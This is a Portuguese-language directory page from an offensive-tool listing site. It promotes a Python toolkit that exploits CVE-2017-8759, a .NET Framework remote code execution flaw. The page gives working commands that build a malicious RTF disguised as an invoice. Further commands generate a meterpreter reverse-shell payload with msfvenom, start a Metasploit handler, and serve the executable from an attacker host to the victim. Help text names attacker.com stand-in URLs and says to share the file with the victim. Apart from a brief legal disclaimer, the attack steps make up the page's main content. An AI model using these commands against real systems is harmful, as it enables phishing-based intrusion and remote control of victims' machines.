Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2017-8759 — CVE-2017-8759 微软word漏洞利用脚本 | Kitploit
Ferramentas/GitHubGitHub/adeljck/cve-2017-8759
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubadeljck/cve-2017-8759

CVE-2017-8759

CVE-2017-8759 微软word漏洞利用脚本

Ver Repositório
há 7 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Ferramenta de exploração CVE-2017-8759

A ferramenta de exploração CVE-2017-8759 é um prático script Python que oferece a testadores de penetração e pesquisadores de segurança uma maneira rápida e eficaz de testar a execução remota de código (RCE) no Microsoft .NET Framework. Ela pode gerar um arquivo RTF malicioso e entregar metasploit / meterpreter / outros payloads à vítima sem nenhuma configuração complexa.

Aviso legal

Este programa é apenas para fins educacionais. Não o utilize sem permissão. O aviso legal habitual se aplica, especialmente o fato de que eu (bhdresh) não sou responsável por quaisquer danos causados pelo uso direto ou indireto das informações ou funcionalidades fornecidas por estes programas. O autor ou qualquer provedor de Internet NÃO assume responsabilidade pelo conteúdo ou uso inadequado destes programas ou de qualquer derivado deles. Ao usar este programa, você aceita que qualquer dano (perda de dados, falha do sistema, comprometimento do sistema, etc.) causado pelo uso destes programas não é de responsabilidade do bhdresh.

Por fim, este é um desenvolvimento pessoal, por favor respeite sua filosofia e não o use para coisas ruins!

Nota de lançamento:

Foram introduzidas as seguintes funcionalidades no script

root@kitploit:~
- Gerar arquivo RTF malicioso
- Modo de exploração para o arquivo RTF gerado

Versão: Python versão 2.7.13

Cenário: Entregar payload meterpreter local

Exemplos de comandos
root@kitploit:~
1) Gerar arquivo RTF malicioso
   # python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.txt
2) (Opcional, se usar payload MSF): Gerar payload metasploit e iniciar handler
   # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
   # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) Iniciar toolkit no modo de exploração para entregar payload local
   # python cve-2017-8759_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe

Argumentos de linha de comando:

root@kitploit:~
# python cve-2017-8759_toolkit.py -h

Esta é uma prática ferramenta para explorar CVE-2017-8759 (RCE no Microsoft .NET Framework)

Modos:

-M gen                                          Gerar apenas arquivo malicioso

     Gerar arquivo RTF/PPSX malicioso:

      -w <Filename.rtf>                   Nome do arquivo RTF malicioso (Compartilhe este arquivo com a vítima).

      -u <http://attacker.com/test.txt>   Caminho do arquivo txt remoto. Normalmente, deve ser um domínio ou IP onde esta                                          ferramenta está sendo executada.
                                          Por exemplo, http://attackerip.com/test.txt (Este URL será incluído no 	                                              arquivo RTF malicioso e será solicitado quando a vítima abrir o arquivo RTF malicioso.

				      
-M exp                                          Iniciar modo de exploração

     Exploração:
  
      -p <TCP port:Default 80>            Número da porta local.

      -e <http://attacker.com/shell.exe>  O caminho de um arquivo executável / shell meterpreter / payload que precisa ser executado no alvo.

      -l </tmp/shell.exe>                 Especificar o caminho local de um arquivo executável / shell meterpreter / payload.
Baixar ferramenta